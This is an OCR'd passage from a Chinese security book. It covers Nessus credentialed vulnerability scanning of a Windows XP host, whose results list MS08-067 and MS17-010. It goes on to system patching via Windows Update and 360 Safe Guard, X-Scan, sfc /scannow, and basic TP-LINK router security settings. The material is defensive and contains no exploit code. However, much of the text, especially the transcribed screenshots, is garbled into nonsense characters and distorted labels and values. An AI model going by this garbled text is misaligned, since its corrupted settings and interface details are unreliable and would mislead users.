创建 一 个 完整 的 扫描 需要 以 下 几 个 步 又 : 
创建 新 的 扫描 ， 这 里 选择 高 级 扫描 项 ， 基 础 设置 中 输入 一 个 扫描 的 名 称 以 及 目标 地 


址 ， 如 下 图 所 示 。 


DiscovERY 


ASSESSMENT 


pEponT 


ADWANCED 


WindowxPp 


My Scans ~ 


192.168.1103 


B37 
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[step 较 这 里 以 Windows XP 系统 来 测试 ， 在 凭证 中 选择 Windows 输 入 一 个 账号 密码 ， 如 下 图 
所 示 ， 这 样 Nessus 会 登录 到 系统 提供 更 全 面 的 一 个 扫描 ， 其 中 也 包括 勒索 病毒 扫描 。 如 果 
是 在 Linux 系 统 下 选择 SSH，Nessus 还 支持 其 他 更 多 的 登录 ， 如 邮件 服务 器 、 数 据 库 等 会 根 
据 实际 需要 添加 凭证 。 


Scenes Crodentals Compiance Plugrs | 
tm Wndons 

Aumenacaacn Meee Passmor > 

swWPpv3 
Usemame 

ssH 

Wroows Passom 
Domain 

添加 完 账号 后 下 方 有 一 个 全 局 设置 ， Global Credential Settings 


其 中 包括 4 项 ， 如 右 图 所 示 。 
(1) 不 以 明文 的 方式 传输 账号 密码 ， 
避免 因为 网 络 嗅 探 造成 账号 密码 泄露 。 


YNever send credentials in the clear 


¥ Donotuse NTLMvI authenticatlon 


(2) 不 以 NTLMV1 的 方式 验证 默认 ， 和 
会 使 用 v2 的 方式 验证 。 可 Enabeaamnataivesnassaumg the scan 

(3) 开启 远程 注册 表 扫 描 ， 扫 描 结 束 [tsp 图 合 规 性 设置 ， 如 果 已 知 目标 主机 操作 
后 会 自动 关闭 。 系统 类 型 ， 可 以 从 这 里 进行 设置 ， 还 可 以 

(4) 在 扫描 期 间 开 启 网 络 共享 扫描 ， 选择 不 同 的 应 用 ， 这 里 选择 Windows XP 系 
扫描 结束 后 会 自动 关闭 。 统 ， 如 下 图 所 示 。 


DISA Windows Server 2008 MS STIG v6ré1 
DISA windows Seve 2008 R2 DC ST'G 
DISA Windows server 2008 nz Ns STIG 
DISA Vindows server 2012 and 2012 22 
DISA Wincws Server 2012 and 2012 32 


nan ernie 


ED ~ 


step 国 选择 完成 后 单 击 Save 按 钮 ， 将 所 有 的 设置 保存 ， 在 扫描 中 可 以 看 到 新 创建 的 扫描 任 
务 ， 如 下 图 所 示 。 


Vy Soans Co | 
| 

| 

| Name scheoue Last Modfied y 

| 

| wdowxp On Demand Touay at¥12 Al 


step 较 如 果 不 需要 定时 任务 ， 直 接 单 击 最 右 侧 的 类 似 播放 的 一 个 三 角形 图 标 按钮 ， 便 可 以 
启动 扫描 ， 如 下 图 所 示 。 
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Last Modified » 


OQ Today at 3:29 AM 


step 园 扫描 完成 后 ， 可 以 单 击 该 扫描 项 跳 转 到 扫描 结果 页 面 ， 如 下 图 所 示 。 这 里 会 列 出 详 
细 的 扫描 信息 ， 并 且 以 不 同 颜色 标注 出 各 种 威胁 程度 的 漏洞 数量 。 


wo 

本 ee Bi 

anne [ 
i 
no 
eer lo en 
Wi 
et “Ends 
a 


单 击 Export 右 侧 的 下 拉 按 钮 ， 在 弹出 的 下 拉 列 表 中 可 以 选择 将 扫描 结果 以 哪 种 形式 
导出 ， 如 下 图 所 示 。 


Conflgure 。 Audi Trall Launch ~ Expor ~ 


Nessus 


CSV | 


NessusDB | 


以 生成 PDF 格式 为 例 ， 生 成 的 扫描 报告 如 下 图 所 示 。 这 里 会 列 出 每 一 种 漏洞 的 详细 
说 明 ， 以 及 修补 方法 。 


192.168.1.102 


< 
号 
日 
四 


Total: 34 


SEVER™ evss PLUON MWE 


区 


MS08-067: Microsoft Windows Server Seryce Cmhed RPC Request 
Handing Remote Code Executon (958644) (ECLIPSEDWING) 
(uncredentialed check) 


人 
多 


MS09-001: Microsoft Windows SMB Vulnerablites Remote Code Execution 
958687) (uncredentialed check) 


MS17.010: Securty Update for Microsoht Wndows SMB Sever (4013389) 
(ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) 
(ETERNALSYNERGY) (WannaCry) (EtermalRocks) (Petya) (noredentialed 
check) 


Mcrosoft Wndows XP Unsupporied Instalation Detection 


Unsupported Windows OS 


Miaoson Wndows SMB NULL Sesson Authenticabon 


SMB Signing not required 


里 
日 


Authenscation Faiure - Local Checks Not Run 


有 


0 Authentcation Faiurefs) for Provided Credentials 


昌 
日 


Common Ptadom Enumeration (CPE) 


r 


Device Type 


# 
加 


Eihemet Card Manufacurer Detection 


日 


要 
S 
时 


Ethemet MAC Addresses 


239 


得 12.6 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


系统 漏洞 的 安全 防护 


要 想 防范 系统 的 漏洞 ， 首 先 要 及 时 为 
系统 打 补 丁 ， 下 面 介绍 几 种 为 系统 打 补 丁 
的 方法 。 


12.6.1 及 时 更 新 系统 


Windows 更 新 是 系统 自 带 的 用 于 检测 
最 新 系统 的 工具 ， 使 用 Windows 更 新 可 
以 下 载 并 安装 系统 更 新 ， 具 体 的 操作 步骤 
如 下 。 
单 击 “ 开 始 ”按钮 ， 在 打开 的 “ 开 
始 ” 菜 单列 表 中 选择 “设置 ”菜单 项 ， 如 
下 图 所 示 。 


文件 资源 管理 器 


step 图 打开 “设置 ”窗口 ， 可 以 看 到 有 关系 
统 设 置 的 相关 功能 ， 如 下 图 所 示 。 


Bx 
已 国 图 邓 
本 区 
二 
只 个 如 白 
PP 时 间 和 征 言 BA 
ee fe eg LT 
> 


mie; 
Windows 重新 信 


step 图 单 击 “ 更 新 和 安全 ”图 标 ， 打 开 “ 更 
新 和 安全 ”窗口 ， 选 择 “Windows 更 新 ” 选 
项 ， 如 下 图 所 示 。 
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< 二 - a x 
二 RS 全 ES 
3 wo sy 

Windows Defender 


《9 各 已 安 条 新 的 更 新 。 上 次 检 理 时 间 ; 帮 天 10:42 
各 从 


座 查 避 新 
赂 各 

析 下 载 着 自动 安装 可 有 于 新 。 
六 

正在 庆 扩 有 关 果 新 更 新 的 信息 所 
针对 开发 人 员 了 名 更 所 信 电 

噩 选 而 


单 击 “ 检 查 更 新 ”按钮 ， 即 可 开始 检 
查 网 上 是 否 存在 更 新 文件 ， 如 下 图 所 示 。 


< 上 
EB EE | 
Vw 
Windows Defender 
Lean 
和 
De 正在 六 有 关 林 更 新 的 信息 1 
了 解 更 多 信息 
大 丽 流 雹 
针对 开发 人 只 


step 轿 检查 完毕 后 ， 如 果 存 在 更 新 文件 ， 则 
会 弹出 下 图 所 示 的 信息 提示 ， 提 示 用 户 有 
可 用 更 新 ， 并 自动 开始 下 载 更 新 文件 。 


党 wINpows 更 新 


Windows 更 新 


有 可 用 更 新 。 
“适用 于 Windows 10 Version 1511 的 累积 本 新 (KB3124262)。 


详细 信息 


正在 准备 安装 更 新 703% 


正在 查 乒 有 关 最 新 更 新 的 信息 玛 ? 
了 钥 更 令 信 息 


高 级 选项 


step 较 下 载 完 毕 后 ， 系 统 会 自动 安装 更 新 文 
件 ， 安装 完毕 后 ， 会 弹出 下 图 所 示 的 信息 


po Sr 
入 wiNpows a 

已 为 你 安排 了 一 次 重启 

0， 作 可 以 一, 由 可 /i 相思， 而 tin 
全 

©® EE 130 FA 


© Wa 
a 


EE 页 


am 


在 直 扫 有 关 昌 新 更 新 的 售后 7 
了 mr 


EGG 图 单 二 “立即 重新 启动 ”按钮 ， 即 重新 
Se 重新 启动 完毕 后 ， 再 次 打开 
“Windows 更 新 ”窗口 ， 在 其 中 可 以 看 到 


“你 的 设备 已 安装 最 新 的 更 新 ……” 信 息 
提示 ， 如 下 图 所 示 。 
rt = 
各 全 EE 
ew Windows 更 新 
Pe En 上 次 榨 查 时 间 : 今天 
备份 my 
你 所 愉 二 克也 
车 汪 将 下 载 并 自动 安 某 可 用 更 新 
外 开发 人 加 正在 可 拒 有关 生 亲 更 新 的 估 忆 辐 ) 
了 解 更 多 信号 
Sa 


单 击 “ 高 级 选项 ”按钮 打开“ 高 级 
选项 ”设置 工作 界面 ， 在 其 中 可 以 设置 更 
新 的 安装 方式 ， 如 下 图 所 示 。 
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管 ” 高 造 硕 


请 选择 安装 更 新 的 方式 


过/ 安 排 二 新 自动 
aa 我 们 本 在 你 直 全 局 没 各 时 自 翅 本 所 启动 设 各 。 更 新 棕 不 全 还 过 过 质 号 计 妆 的 
Merenpe 


口 于 i Windows 时 捉 供 共 他 Microsoft 产品 的 更 新 。 


口 


扒 E 逢 级 
也 放 玫 信息 
天 二 新 历史 局 地 
选择 如 何 提供 更 新 


获取 Insider Preview 版 本 


压 为 第 一 坟 能 查 厂 Windows 的 后 等 新 和 改进 并 反 供 后 馆 的 人 员 之 一 


第 12 章 无 线 网 络 中 主机 漏洞 的 安全 防护 = 


12.6.2 为 系统 漏洞 打 补丁 


除 使 用 Windows 系 统 自 带 的 Windows Up- 
date 下 载 并 及 时 为 系统 修复 漏洞 外 ， 还 可 以 使 
用 第 三 方 软件 及 时 为 系统 下 载 并 安装 漏洞 补 
丁 ， 常 用 的 有 360 安 全 卫士 、 优 化 大 师 等 。 

使 用 360 安 全 卫士 修复 系统 漏洞 的 具体 
操作 步骤 如 下 。 

[step 图 双 去 桌面 上 “360 安 全 卫士 ”图 标 ， 
打开 “360 安 全 卫士 ”， 如 下 图 所 示 。 


日 甸 


二 加 单 击 “系统 修复 ”按钮 ， 进 入 下 图 所 
示 页 面 ， 如 下 图 所 示 。 


Eg 单 去 “全 面 修复 ”按钮 ， 360 安 全 卫 
士 开 始 自动 扫描 系统 中 存在 的 漏洞 ， 并 在 
下 面 的 界面 中 显示 出 来 ， 用 户 在 其 中 可 以 
自主 选择 需要 修复 的 漏洞 ， 如 下 图 所 示 。 
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[se 加 单 去 “一 键 修复 ”按钮 ， 开 始 修复 系 
统 存在 的 漏洞， 如 下 图 所 示 。 


[step 图 修复 完成 后 ， 则 系统 漏洞 的 状态 变 为 
“已 修复 ”， 如 下 图 所 示 。 


© 漏洞 收 息 处 珠 中 .… ED 
| 
J unen sn 


12.7 ”实战 演练 


实战 演练 1 一 一 使 用 X-Scan 扫 描 系 统 
漏洞 

X-Scan 是 国内 最 著名 的 综合 扫描 器 之 
一 ， 它 可 以 扫描 出 操作 系统 类 型 及 版 本 、 
标准 端口 状态 及 端口 BANNER 信 息 、CGI 漏 
洞 、IS 漏 洞 、RPC 漏 洞 等 信息 。 

扫描 系统 漏洞 的 操作 步骤 如 下 : 
[step 图 在 “X-Scan v3.3 GUI” 主 窗口 中 单 
击 开始 扫描 图 标 获 ， 即 可 进行 扫描 。 在 扫 
描 的 同时 显示 扫描 进程 和 扫描 所 得 到 的 信 
息 ， 如 下 图 所 示 。 
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准 Xx-scan v33 GUI 一 口 x 
六 stV， 认 本 W)， 坦 香 X0， 工具， language 地 动 D) 

|@lem | 加 | 国 言 | 加 
[si 本 


seslhest 日 2 正在 入 8 村 前 服务 


普通 信息 | 需 条 六 证 | 榜 训 信息 | 


起 半 co pn seous orel 


hi 


is 


end 0 CrrerinTam ros a1 7 


Eee 图 在 扫描 完成 之 后 ， 即 可 看 到 HTML 格 
式 的 扫描 报告 。 在 其 中 既 可 看 到 活动 主机 IP 
地 址 、 存 在 的 系统 漏洞 和 其 他 安全 隐患 ， 还 
可 看 到 安全 隐患 的 解决 方案 ， 如 下 图 所 示 。 


0 x 
Beierenn Ts D - ©| Bx scan Repor © 
3 EE sn 
和 
i 
3 
a 
Pe 
br 
EE 
EE 人 到 时 
本 ER 
tea 
| 主 所 分 煌 : locaihost 
主机 和 由 | 瑟 1 必 和 时 和 后 天 
oe ET Ee 
ET localhont 
天 9 党 服 入 雪人 关税 冯 二 
me 
be 
towed TENT Ee 
najD: om v 


在 “X-Scan v3.3 GUI” 主 窗口 中 切换 
到 “漏洞 信息 ”选项 卡 下 ， 即 可 看 到 存在 
漏洞 的 主机 信息 ， 如 下 图 所 示 。 


的 X-5canv33 GUI 二 可 x 
文中 Vi 讼 团 (W) 查看 %) 工具 Y) language 帮 支 (7 

© Phe 二 | 国定 |@ 

区 1 EL [时 


ealhest 1 二 


正在 伐 别 开交 有 有 务 


苦 通 信息 “ 吻 癌 半 记 | 衬 训 信息 | 
[rm 天 二 天生 600tcp 
at: FR 
hockost] 其 城 服 寺 445/t 吕 
seaest 445/tey -micrctcft-ds 服务 可 能 运行 于 说 庆 吕 


ET 


实战 演练 2 一 一 使 用 命令 扫描 并 修复 系统 

SFC 命 令 是 Windows 操 作 系 统 中 使 用 频 
率 比 较 高 的 命令 ， 主 要 作用 是 扫描 所 有 受 
保护 的 系统 文件 并 完成 修复 工作 。 该 命令 
的 语法 格式 如 下 : 


SFC [/SCANNOW] 


[/SCANONCE] [/ 


SCANBOOT] [/REVERT] [/PURGECACHE] [/ 
CACHESIZE=x] 
各 个 参数 的 含义 如 下 : 
e /SCANNOW: 立即 扫描 所 有 受 保护 
的 系统 文件 。 
e /SCANONCE: 下 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 
e /SCANBOOT: 每 次 启动 时 扫描 所 
有 受 保护 的 系统 文件 。 
e /REVERT: 将 扫描 返回 到 默认 设置 。 


e /PURGECACHE: 清除 文件 缓存 。 


e /CACHESIZE=x: 设置 文件 缓存 
大 小 。 
下 面 以 最 常用 的 sfc/scannow 为 例 进行 
讲解 。 具 体操 作 步 又 如 下 : 


sep 图 右 去 “开始 ”按钮 ， 在 弹出 的 快捷 菜 
单 中 选择 “命令 提示 符 ( 管 理 员 ) ”菜单 
命令 ， 如 下 图 所 示 。 


step 图 弹出 “管理 员 : 命令 提示 符 ” 窗 口 ， 
输入 命令 sfc/scannow， 按 Enter 键 确认 ， 如 
下 图 所 示 。 
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并 显示 扫描 的 进 


[step 图 开始 自动 扫描 系统 ， 


度 ， 如 下 图 所 示 。 


国生 


step 图 在 扫描 的 过 程 中 ， 如 果 发 现 损坏 的 系 
统 文件 ， 会 自动 进行 修复 操作 ， 并 显示 修 
复 后 的 信息 ， 如 下 图 所 示 。 


小 试 身 手 


12.8 


练习 1: 使 用 Nmap 工 具 扫描 漏洞 。 
: 使 用 OpenVAS 工 具 扫描 漏洞 。 
3: 使 用 Nessus 工 具 扫 描 漏 洞 。 

: 系统 漏洞 的 安全 防护 。 
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在 无 线 网 络 中 ， 能 够 发 送 与 接收 信号 的 重要 设备 就 是 无 线路 由 器 了 ， 因 此 ， 对 无 
线路 由 器 的 安全 防护 ， 就 等 于 看 紧 无 线 网 络 的 大 门 。 本 章 介绍 无 线路 由 器 的 安全 防护 策 
略 ， 主 要 包括 无 线路 由 器 的 基本 设置 、 无 线路 由 器 的 安全 策略 以 及 无 线路 由 安全 管理 工 


具 等 。 


浊 13.1 无 线路 由 器 的 基本 设置 


无 线路 由 器 相信 大 家 都 不 陌生 ， 但 是 
懂得 如 何 设置 的 却 不 多 。 本 节 针 对 家 用 无 
线路 由 器 的 设置 进行 讲解 。 


13.1.1 通过 设置 向 导 快速 上 网 


目前 多 数 家 用 无 线路 由 器 都 提供 了 
网 页 进入 页 面 ， 当 用 户 登 录 路 由 后 会 提供 
一 个 向 导 ， 通 过 向 导 设 置 可 以 最 快 地 实现 
连接 外 网 。 家 用 路 由 器 背面 会 有 路 由 器 型 
号 、 路 由 器 IP〈 进 入 路 由 的 地 址 ) 、 管 理 员 
账号 及 密码 等 信息 ， 如 下 图 所 示 。 


通过 向 导 设置 路 由 器 并 进行 上 网 的 具 
体操 作 步 又 如 下 : 

Estee 加 打开 IE 浏 览 器 ， 在 地 址 栏 中 输入 路 由 
器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 网 址 
为 192.168.0.1， 输 入 完成 后 单 击 “ 转 至 ” 按 
钮 ， 即 可 打开 路 由 器 的 登录 窗口 ， 如 下 图 
所 示 。 


口 rwRsssh x 王 有 
© | wo 太 | 三 由 
TP-LINK 


青 输入 管理 员 密 码 


确认 


step 图 在 “请 输入 管理 员 密 码 ” 文 本 框 中 给 
入 管理 员 的 密码 ， 黑 认 情 况 下 管理 员 的 密 
码 为 123456， 如 下 图 所 示 。 


[= x 夺 - oOo x 
和 9 交 作 三 后 二 名 瑟 ” 
TP-LINK 
青 和 输入 管理 只 密码 
eee000 
忘记 这 型 9 


[step 图 单 去 “确认 ”按钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


pk 


Le Beild 14050¢ Kel DU 
Es 上 Sa 


step 贺 选择 “设置 向 导 ” 选 项 ， 即 可 进入 
“设置 向 导 ” 对 话 框 ， 如 下 图 所 示 。 


EEC 


本 人 向 导 可 设置 上 网 所 项 的 基本 网 络 赦 赤 ， 请 单 击 “ 下 一 步 ”继续 。 知 要 详细 设 
置 某 项 功能 或 参数， 请 点 击 左 侧 由 关 栏 目 。 


下 - 步 


[EGG 单 直 “ 下 一 步 ”按钮 ， 进 入 “设置 向 
导 - 上 网 方式 ”对 话 框 ， 在 其 中 选择 上 网 方 
式 。 其 中 PPPoE 为 拨号 上 网 ， 一 般 由 运营 商 
提供 具体 账号 、 密 码 ， 动 态 I[P 和 静态 IP 则 多 
为 分 网 时 使 用 ， 可 以 根据 实际 需求 选择 ， 
如 下 图 所 示 。 


本 向导 提供 三 种 最 常见 的 上 同方 式 供 选择 。 若 为 其 它 上 网 方 式 ， 请 点 击 左 他 “网 
络 驳 数 ”中 “WAN 口 设置 " 进行 设置 。 如 果 不 清楚 使 用 何 种 上 网 方式 ， 请 选择 “让 
路 由 器 自动 选择 上 网 方式 ”。 


轩 让 由 由 器 自动 选择 上 网 方式 (推荐) 
PPPoE (ADSL 虚 拟 拨号 )》 
动态 IP 《以 太 网 宽带 ， 自 动 从 网 络 服务 商 钦 取 TP 地 址 ) 
静态 II 以太 网 宽带 ,网络 服务 商 提供 固定 I 地 址 ) 


= 


下 步 | | 


[step 园 单 击 “下 一 步 ” 按 钮 ， 进 入 “设置 
向 导 -无 线 设 置 ” 对 话 框 ， 在 其 中 设置 路 
由 器 无 线 网 络 的 基本 参数 以 及 无 线 安全 
选项 ，“ 无 线 安全 选项 ”可 以 采用 WPA- 
PSK/WPA2-PSK 方 式 输入 密码 ， 如 下 图 
所 示 。 
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asss -x65 


本 | 册 导 页 面 设置 路 由 器 无 线 由 络 的 基本 基 考 以 及 无 线 安全 。 


无 线 棒 态 : 开启 ， 

ssm: TP-LINK_O12F08 
信道 : 自动 

模式 : Tibgn mixed v 
频段 这 宽 : 自动 " 

无 线 安 全 选项 : 


为 保障 网 给 安全 ， 强 列 推荐 开启 无 绪 安全 ， 并 使 用 WPA-PSK/WPA2-PSK AES 加 密 方 
式 。 


不 开启 无 线 支 全 
WPA-PSE/WPA2-PSE 
PSHED: 
《6-63 个 ASCII 码 字符 或 8-64 个 十 六 进 制 字符 》 
不 修改 无 线 安全 设置 
上 - 步 ] [下 =- 步 


人 移 注 意 : 无 线 密码 长 度 不 能 小 于 8， 否 则 会 
有 提示 ， 如 下 图 所 示 。 


192.168.1.1 显示 : 


0 PSK 密 码 长 度 不 能 小 于 8， 请 重新 绽 入 ! 


华 止 此 页 再 显示 对 话 框 。 


[step 国 单 击 “ 下 一 步 ” 按 钮 ， 即 可 完成 向 导 
设置 ， 并 弹出 下 图 所 示 的 对 话 框 。 

ms 
设置 完成 单 击 “重启 ”后 沼 由 器 将 重启 以 使 设置 生效。 


提示 : 若 路 由 器 重启 后 仍 不 能 正常 上 网 ，， 请 点 击 左 创 “ 网 络 各 数 " 进 
入 “AN 设置” 栏目， 确认 是 否 设置 了 正确 9WAT 口 连接 类 型 和 捧 号 模式 * 


下 -= 元 ] [重启 ] | 
step 图 单 去 “重启 ”按钮 ， 重 启 路 由 器 ， 如 


下 图 所 示 。 等 待 路 由 器 重启 完成 后 ， 就 可 
以 进行 上 网 了 。 


配置 保存 成 功 ! 


正在 重新 启动 
35% EE 
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13.1.2 ”状态 查看 及 QSS 安 全 设置 


设置 好 路 由 器 以 后 ， 重 启 路 由 器 并 重 
新 进入 路 由 ， 此 时 可 以 查看 路 由 器 的 运行 
状态 ， 路 由 状态 给 出 了 路 由 器 运行 时 的 一 
些 简 要 信息 。 在 路 由 的 左 侧 功能 列表 中 选 
择 “ 运 行 状态 ”选项 ， 在 打开 的 界面 中 可 
以 查看 路 由 器 的 状态 ， 主 要 包括 以 下 几 个 
信息 。 

(1) 版 本 信息 。 列 出 了 路 由 器 的 当前 
软件 版 本 及 硬件 版 本 信息 ， 如 下 图 所 示 。 


当前 软件 版 本 : 
当前 神 件 版 本 : 


4.19.18 Build 130123 Rel 32879n 
WEB45N 2.0 00000000 


摘 发 送 
字 节 数 : 9458 
教 据 包 雪 : 0 115 


在 路 由 功能 列表 中 选择 “QSS 安 全 设 
置 ”选项 ， 即 可 进入 “QSS 安 全 设置 ” 界 
面 。 在 其 中 可 以 对 路 由 器 的 QSS 功 能 进行 安 
全 设置 ， 如 下 图 所 示 。 


(ca | 


ey: BF 
Seng: 516057 上 [ERP | [EP 
添加 新 设备 : 添加 设备 
[ED | 


(2) LAN 口 状态 。 会 有 连 入 路 由 的 设 
备 MAC 地 址 、IP 地 址 、 子 网 掩 码 等 信息 ， 
如 下 图 所 示 。 
CE 
JUAC 地 址 : 


本 地 址 : 
子 网 撞 码 : 


192. 168.1.1 


1C-PA-68-01-27-06 
255.265.255.0 


(3) 无 线 状态 。 会 有 此 路 由 配置 的 无 
线 信息 ， 其 中 包括 SSID 号 、 信 道 、 模 式 、 
MAC 地 址 等 信息 ， 如 下 图 所 示 。 


无 线 功 能 : 启用 

ssID: TP-LINK Ol2708 
信道: 自动 (当前 信道 1) 
模式 : lben nixed 

频 役 带 寓 : 自动 

JANE 地 址 : 1C-FA-68-01-2F-08 
Ws 丑态 : 未 开启 


(4)WAN 口 状态 。 显 示 外 网 连接 情况 。 
如 果 路 由 器 无 法 正常 上 网 可 以 查看 此 处 ， 
排查 故障 ， 如 下 图 所 示 。 
xs | 


DGAC 地 址 : 1C-FA-68-01-2F-09 

下地 址 : 0.0.0.0 动态 IP 

子 网 杭 码 : 0.0.00 

网 关 : 0.0.0.0 AN 口 未 连接 ! 
DRS 服务 器 : 0.0.0.0，00.00 


(5) WAN 口 流量 统计 。 这 里 负责 统计 
上 网 流量 信息 ， 如 果 网 络 异常 数据 量 过 大 
可 以 查看 这 里 的 信息 ， 如 下 图 所 示 。 


246 


侈 提示 : QSS， 即 服务 质量 ， 是 网 络 安全 
机 制 的 一 种 ， 是 通过 给 局 域 网 中 的 应 用 、 
端口 或 计算 机 设 定 优先 次 序 ， 从 而 解决 网 
络 延 迟 和 阻塞 等 问题 的 一 种 技术 。 在 正常 
情况 下 ， 如 果 网 络 只 用 于 特定 的 、 无 时 间 
限制 的 应 用 系统 ， 并 不 需要 QSS， 但 是 对 关 
键 应 用 和 多 媒体 应 用 就 十 分 必要 。 当 网 络 
超载 或 拥塞 时 ，QSS 能 确保 重要 业务 不 受 延 
迟 或 丢弃 ， 同 时 保证 网 络 的 高 效 运行 。 


13.1.3 ”网 络 参数 与 无 线 设置 


路 由 一 般 提供 网 络 参 数 设 置 ， 其 中 包 
括 外 网 设置 、 内 网 设置 、MAC 地 址 复制 ， 
同时 无 线路 由 器 还 提供 无 线 设置 ， 如 下 图 
所 示 。 


网 络 参数 与 无 线 设置 的 操作 步骤 如 下 : 


[step 图 WAN 口 设置 ， 主 要 包括 WAN 口 连接 
类 型 ， 与 向 导 设 置 中 的 3 种 类 型 相同 ， 如 有 
特殊 需要 可 以 设置 DNS 服务 器 ， 否 则 保持 
默认 即 可 ， 如 下 图 所 示 。 


WI 口 连 接 类 型: 动态 P "| [自动 检 列 
王 地 址 : 0.0.0.0 
FR: 00.00 
网 关 : 0.0.0.0 
更 新 释放 WAE 吕 未 连接 ! 
数据 即 mv( 字 节 ): [1500 (点 认 是 1500， 如 丰 必 要 ， 请 生 修 玖 ) 


」 手 sh 设置 NS 服务 器 
DNS 服务 器 : 0000 
备用 DIS 服务 器 : [5000 (可 选 ) 
主机 名 : WR845N 


了 单方 式 亲 了 IP 一 般 情 中 下 请 急流 反 ) 
[EY 


[step 图 LAN 口 设置 ， 主 要 通过 子 网 掩 码 的 设 
置 划 分 内 网 网 段 ， 子 网 掩 码 的 设置 决定 了 
内 网 网 段 ， 同 时 也 确定 了 内 网 最 大 容纳 设 
备 数 量 ， 如 下 图 所 示 。 


本 页 设置 LD 的 基本 网 结 参 数 。 
JUAC 地 址 : 1C-PA-68-01-27-08 
下 地 址 : 192.168.1.1 
子 阿 押 ， 2552552550 
保存 ] [可 助 | 


[Eee 国 MAC 地 址 复制 ， 可 以 对 路 由 器 MAC 
地 址 进行 复制 ， 如 下 图 所 示 。 


本 页 设置 路 由 器 对 广域网 89Uc 地 址 * 


JUAC 地 址 : 00-87-36-2F-D0-46 收复 出 三 MAC 
当前 管理 ctyc 地 址 : [DOSE DO [MAcib 直 | 
注意 : 只 有 局 域 网 中 的 计算 机 才能 使 用 本 功能 。 


[Ez | 
[ep 加 无 线 网 络 基本 设置 ， 包 括 SSID (网络 
名 称 ) 号 的 设置 、 信 道 设置 、 通 信 模 式 以 
及 频段 带宽 等 参数 ， 如 下 图 所 示 。 


本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 > 


SSIDS: TP-LINK_012F08 
信道 : 自动 
模式 : Tibgn med v 


频段 带宽 : 自动 " 
四 开启 无 线 功 能 
四 开户 SSID 广 播 

开启 wns 


[step 图 无 线 网 络 安全 设置 ， 包 括 4 种 方式 ， 
第 1 种 不 开启 无 线 安全 ， 这 种 方式 除 测试 
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外 不 建议 使 用 ; 第 2 种 方式 使 用 WPA-PSK/ 
WPA2-PSK 方 式 ， 一 般 建 议 使 用 这 种 方式 ， 
目前 是 比较 主流 的 网 络 安 全 方式 ; 第 3 种 方 
式 是 WPA/WPA2 方 式 ， 这 种 方式 同 第 2 种 方 
式 类 似 ， 只 是 加 密 方式 为 自 定义 ; 第 4 种 方 
式 使 用 WEP 方 式 ， 该 方式 已 经 被 曝 出 存在 
严重 安全 隐患 ， 除 测试 外 不 建议 使 用 ， 如 
下 图 所 示 。 


本 页 面 设置 路 由 器 无 线 取 络 的 安全 认证 选 硕 。 
支 全 提示 : 为 保障 网 络 安全 ， 强 列 推荐 开启 安全 设置 ， 并 使 用 中 A 
PSK/WPA2- 了 SK AES 加 密 方 法 。 


不 开启 无 线 安全 


本 WPA-PSK/WFA2-FSK 
认证 类 型 ; 自动 
加 宇和 法 : AES 
PSKED: 123456769 
《6-63 个 ASCIT 码 字符 或 6-64 个 十 六 进 制 字符 ) 
185400 


《单位 为 秒 ， 最 小 值 为 50， 不 更 新 岂 为 0 


组 定 铀 更 新 周 
期 : 


MAP 
认证 类 型 : 自动 
加 密 算 法 : 自动 " 
Radix 服务 器 IF: 
Radius 庙 口 : 1812 《1- 65535，0 表 示 默 认 庙 口 : 1812) 
Radius 宣 码 : 
组 密 锡 更 新 周期 。 [86400 


《单位 为 种 ， 最 小 值 为 0， 不 更 新 为 0) 


密 角 选择 WE? 密 家 密 旬 类 型 

密 钥 1: EE 

定 胃 2: EE 

密 钥 3: EE 

密 铀 4: 茜 用 

[保存 ] ” [地 助 

无 线 网 络 MAC 地 址 过 滤 设 置 ， 如 果 开 
启 MAC 地 址 过 滤 ， 只 有 添加 进来 的 MAC 设 
备 可 以 正常 通信 ， 列 表 之 外 的 设备 无 法 进行 


通信 ， 这 个 只 是 相对 的 ， 后 面 会 讲解 如 果 通 
过 MAC 复 制 实现 通信 ， 如 下 图 所 示 。 


天 ur 地 寺 过 污 江 叶 


本 页 设置 WC 地 圳 过 滤 未 控制 计算 机 对 本 无 线 网 给 的 访问 = 
了 EC 地 址 过 小 功能 : 已 关闭 。[ 启用 过 汪 


过 湛 规 网 
时 梭 止 列表 中 生 共 pgUC 地 址 访问 本 无 线 网 络 
中 克 许 列表 中 生 刘 9DC 地 址 访问 本 无 线 P 纤 
m BC 地 址 术 态 指 述 编辑 
添加 新 条 目 新 有 条 目 生效 | [新 有 条 目 失效 | | 猎 队 白 有 条 目 
上 页 | 奈 = 页 | | 大 二 
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[step 图 无线 高 级 设置 ， 其 中 有 Beacon 帧 广播 
间隔 时 间 ， 移 动 设 备 通过 Beacon 帧 检测 空 
间 中 存在 的 无 线路 由 ， 通 过 设置 Beacon 帧 
可 以 达到 隐藏 无 线路 由 的 效果 ， 如 下 图 所 
示 。 当 然 ， 隐 藏 无 线路 由 也 是 相对 的 。 后 
面 会 讲解 如 何 挖 出 隐藏 的 无 线路 由 。 


Bescon 肝 模 100 (40-1000) 
RTS 时 本 : 2346 (1-2346) 不 丰 设 置 IWT 了 时 务 基 的 短 态 地 直 分 综 们 驴 。 
分 上 人 3 (C25e-2348) pe 
Drm 从: ms 注意 * 添加 、 了 hj 日 和 x 志 有 条 三 人 任何 更 站 ， 委 重启 本 设备 后 才能 生 效 。 
网 开启 wm 回 wt | It | 关机 | 博克 ] 
ea le | [| [SEE [| 
开启 i 凡 训 于 二 本 
| EE [ 压 二 | 
保存 | [可 


| SPRE 
fasersrosvz 


rn 
ep 


下 地 直 ” 庐 交 时 司 
EE i 


step 图 静态 地 址 分 配 ， 从 这 里 可 以 对 客户 端 
IP 地 址 进行 静态 分 配 ， 通 过 静态 分 配 设置 将 
不 再 通过 DHCP 动 态 分 配 ， 如 下 图 所 示 。 


13.1.4 ”DHCP 与 转发 规则 


DHCP 服 务 是 给 内 部 网 络 或 网 络 服务 供 
应 商 自 动 分 配 耳 地 址 ， 给 用 户 或 者 内 部 网 络 
管理 员 作为 对 所 有 计算 机 做 中 央 管 理 的 手 
段 。 转 发 规则 是 内 网 与 外 网 的 一 个 映射 过 
程 ， 如 下 图 所 示 。 
DHCP 服 务 器 
4CP 服 务 


